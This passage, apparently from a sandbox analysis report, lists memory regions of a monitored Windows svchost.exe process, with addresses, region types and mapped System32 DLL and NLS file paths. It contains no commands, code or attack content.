0x2676fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 10149 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 10150 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 10151 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 10152 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 10153 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 10154 start_va = 0x2b00000 end_va = 0x2b8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 10155 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 10156 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 10157 start_va = 0x2f00000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 10158 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 10159 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 10160 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 10161 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 10162 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 10163 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 10164 start_va = 0x3950000 end_va = 0x3956fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 10165 start_va = 0x39d0000 end_va = 0x39d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 10166 start_va = 0x39e0000 end_va = 0x3a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 10167 start_va = 0x3a60000 end_va = 0x3b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 10168 start_va = 0x3b60000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 10169 start_va = 0x3c60000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 10170 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 10171 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 10172 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 10173 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 10174 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 10175 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 10176 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 10177 start_va = 0x4400000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 10178 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 10179 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 10180 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 10181 start_va = 0x48d0000 end_va = 0x48d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 10182 start_va = 0x48e0000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 10183 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 10184 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 10185 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 10186 start_va = 0x4bd0000 end_va = 0x4bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 10187 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 10188 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 10189 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 10190 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 10191 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 10192 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 10193 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 10194 start_va = 0x54f0000 end_va = 0x55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 10195 start_va = 0x55f0000 end_va = 0x55f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 10196 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 10197 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 10198 start_va = 0x5800000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 10199 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 10200 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 10201 start_va = 0x5a80000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 10202 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 10203 start_va = 0x5c80000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 10204 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 10205 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 10206 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 10207 start_va = 0x6180000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 10208 start_va = 0x63c0000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 10209 start_va = 0x6560000 end_va = 0x6564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 10210 start_va = 0x6570000 end_va = 0x657ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 10211 start_va = 0x6590000 end_va = 0x6596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 10212 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 10213 start_va = 0x66a0000 end_va = 0x66b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 10214 start_va = 0x66c0000 end_va = 0x66d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 10215 start_va = 0x66e0000 end_va = 0x66f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 10216 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 10217 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 10218 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 10219 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 10220 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 10221 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 10222 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 10223 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 10224 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 10225 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 10226 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 10227 start_va = 0x7300000 end_va = 0x7310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 10228 start_va = 0x7320000 end_va = 0x7330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 10229 start_va = 0x7340000 end_va = 0x7350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 10230 start_va = 0x7360000 end_va = 0x7370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 10231 start_va = 0x7380000 end_va = 0x73a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 10232 start_va = 0x73b0000 end_va = 0x73e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 10233 start_va = 0x73f0000 end_va = 0x7400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 10234 start_va = 0x7410000 end_va = 0x7420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 10235 start_va = 0x7430000 end_va = 0x7460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 10236 start_va = 0x7470000 end_va = 0x74a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 10237 start_va = 0x74b0000 end_va = 0x75affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074b0000" filename = "" Region: id = 10238 start_va = 0x75b0000 end_va = 0x76affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075b0000" filename = "" Region: id = 10239 start_va = 0x76b0000 end_va = 0x77affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076b0000" filename = "" Region: id = 10240 start_va = 0x77b0000 end_va = 0x78affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077b0000" filename = "" Region: id = 10241 start_va = 0x79a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 10242 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 10243 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 10244 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 10245 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 10246 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 10247 start_va = 0x84a0000 end_va = 0x859ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084a0000" filename = "" Region: id = 10248 start_va = 0x86a0000 end_va = 0x879ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 10249 start_va = 0x8a00000 end_va = 0x8afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 10250 start_va = 0x8f00000 end_va = 0x8ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f00000" filename = "" Region: id = 10251 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10252 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 10253 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 10254 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 10255 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 10256 start_va = 0x7ffb0c980000 end_va = 0x7ffb0c987fff monitored = 0 entry_point = 0x7ffb0c9813b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 10257 start_va = 0x7ffb0ccd0000 end_va = 0x7ffb0cf7ffff monitored = 0 entry_point = 0x7ffb0ccd1cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 10258 start_va = 0x7ffb0d5c0000 end_va = 0x7ffb0d5d0fff monitored = 0 entry_point = 0x7ffb0d5c28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 10259 start_va = 0x7ffb0d5e0000 end_va = 0x7ffb0d611fff monitored = 0 entry_point = 0x7ffb0d5eb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 10260 start_va = 0x7ffb0e460000 end_va = 0x7ffb0e4a3fff monitored = 0 entry_point = 0x7ffb0e4883e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 10261 start_va = 0x7ffb0e4b0000 end_va = 0x7ffb0e50cfff monitored = 0 entry_point = 0x7ffb0e4de510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 10262 start_va = 0x7ffb0e510000 end_va = 0x7ffb0e61efff monitored = 0 entry_point = 0x7ffb0e54c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 10263 start_va = 0x7ffb0e670000 end_va = 0x7ffb0e6d6fff monitored = 0 entry_point = 0x7ffb0e67b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 10264 start_va = 0x7ffb0f0c0000 end_va = 0x7ffb0f1dcfff monitored = 0 entry_point = 0x7ffb0f0efe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 10265 start_va = 0x7ffb0f7c0000 end_va = 0x7ffb0f7fefff monitored = 0 entry_point = 0x7ffb0f7e82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 10266 start_va = 0x7ffb101e0000 end_va = 0x7ffb101f3fff monitored = 0 entry_point = 0x7ffb101e2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 10267 start_va = 0x7ffb107e0000 end_va = 0x7ffb107f6fff monitored = 0 entry_point = 0x7ffb107e7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 10268 start_va = 0x7ffb10a00000 end_va = 0x7ffb10a17fff monitored = 0 entry_point = 0x7ffb10a0b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 10269 start_va = 0x7ffb10ae0000 end_va = 0x7ffb10b15fff monitored = 0 entry_point = 0x7ffb10ae27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 10270 start_va = 0x7ffb10e10000 end_va = 0x7ffb10e20fff monitored = 0 entry_point = 0x7ffb10e17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 10271 start_va = 0x7ffb10e30000 end_va = 0x7ffb10eb3fff monitored = 0 entry_point = 0x7ffb10e48d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 10272 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 10273 start_va = 0x7ffb10f60000 end_va = 0x7ffb11035fff monitored = 0 entry_point = 0x7ffb10f8a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 10274 start_va = 0x7ffb11040000 end_va = 0x7ffb110a3fff monitored = 0 entry_point = 0x7ffb1105bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 10275 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 10276 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 10277 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 10278 start_va = 0x7ffb11200000 end_va = 0x7ffb11273fff monitored = 0 entry_point = 0x7ffb11215eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 10279 start_va = 0x7ffb11280000 end_va = 0x7ffb113b6fff monitored = 0 entry_point = 0x7ffb112c0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 10280 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 10281 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 10282 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 10283 start_va = 0x7ffb115e0000 end_va = 0x7ffb115eefff monitored = 0 entry_point = 0x7ffb115e4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 10284 start_va = 0x7ffb11600000 end_va = 0x7ffb1160afff monitored = 0 entry_point = 0x7ffb11601de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 10285 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 10286 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 10287 start_va = 0x7ffb116c0000 end_va = 0x7ffb11741fff monitored = 0 entry_point = 0x7ffb116c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 10288 start_va = 0x7ffb12610000 end_va = 0x7ffb12651fff monitored = 0 entry_point = 0x7ffb12613670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 10289 start_va = 0x7ffb12660000 end_va = 0x7ffb126a5fff monitored = 0 entry_point = 0x7ffb126679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 10290 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 10291 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 10292 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 10293 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 10294 start_va = 0x7ffb127f0000 end_va = 0x7ffb12807fff monitored = 0 entry_point = 0x7ffb127f4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 10295 start_va = 0x7ffb12810000 end_va = 0x7ffb12834fff monitored = 0 entry_point = 0x7ffb12815ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 10296 start_va = 0x7ffb12850000 end_va = 0x7ffb12890fff monitored = 0 entry_point = 0x7ffb12853750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 10297 start_va = 0x7ffb128a0000 end_va = 0x7ffb12992fff monitored = 0 entry_point = 0x7ffb128c5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 10298 start_va = 0x7ffb12a60000 end_va = 0x7ffb12a77fff monitored = 0 entry_point = 0x7ffb12a62000 region_type = 